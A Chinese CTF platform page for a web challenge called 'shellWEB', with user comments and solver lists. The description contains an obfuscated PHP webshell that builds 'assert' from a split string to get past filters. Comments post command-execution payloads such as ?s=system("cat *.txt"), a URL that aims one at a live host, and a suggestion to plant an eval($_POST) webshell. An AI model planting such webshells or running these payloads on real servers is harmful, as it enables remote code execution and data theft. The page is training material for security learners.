shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 7103
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
...
登录回复
评论
shan 4年前
举报

用system(dir)来过这个题目,是作者本来的思路吗。看评论好像大家用的方法还挺多种的。

回复 0
yinyue 4年前
举报

不多说了,套娃了解下

回复 1
eleven 4年前
举报

?s=system("cat *.txt")

回复 0
naihe567 4年前
举报

没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx

回复 1
mantou 4年前
举报

http://114.67.246.176:18711/?s=system(%22cat%20xxxxxxxx.txt%22)

回复 0
Y1rannn 4年前
举报

...没那么复杂啊,我直接s=system("")

回复 3
pest 4年前
举报

除了菜刀,还可以利用print_r(glob("*.*")) scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组 show_source() //显示文件源码 highlight_file() //和show_source()函数是一个意思 我直接复制的一个大佬的wp过来的。

回复 0
simpleboy 4年前
举报

解法还是很多的

回复 0
simpleboy 4年前
举报

命令执行了

回复 0
三分踯躅 4年前
举报

哇,真的有那么复杂吗,蚁剑都整上了,难道是我用assert命令执行的姿势太low了吗

回复 0

WriteUp

image
harry

3 金币

立即查看

评分(10)

解题动态

zz0607 攻破了该题 18分钟前
巴咕噜182 攻破了该题 2小时前
yang0000 攻破了该题 15小时前
chi 攻破了该题 21小时前
四叠半神话大系 攻破了该题 21小时前
11223 攻破了该题 23小时前
aboic 攻破了该题 1天前
YYYYHHHHNNNN 攻破了该题 1天前
chenwei001 攻破了该题 1天前
zzuer 攻破了该题 1天前
巧屿 攻破了该题 1天前
彭彭 攻破了该题 1天前
demonsong 攻破了该题 1天前
awesome 攻破了该题 2天前
star_evil 攻破了该题 2天前
JKyukino 攻破了该题 2天前
wwwwjjj 攻破了该题 2天前
daimaojiang 攻破了该题 2天前
jaaa 攻破了该题 2天前
18754065892 攻破了该题 2天前
问题反馈